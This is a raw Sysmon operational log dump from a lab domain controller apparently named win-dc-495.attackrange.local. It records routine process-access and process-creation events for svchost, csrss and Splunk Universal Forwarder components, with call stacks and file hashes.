13:41:44.676{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.676{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.676{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.676{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.676{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.676{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.676{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.676{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.676{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9018-6005-0801-00000000A301}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.676{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9018-6005-0801-00000000A301}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:44.677{59A5CD1D-9018-6005-0801-00000000A301}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9019-6005-0A01-00000000A301}2128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9019-6005-0A01-00000000A301}2128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9019-6005-0A01-00000000A301}2128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.880{59A5CD1D-9019-6005-0A01-00000000A301}2128C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.505{59A5CD1D-9019-6005-0901-00000000A301}28162760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:45.364{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9019-6005-0901-00000000A301}2816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 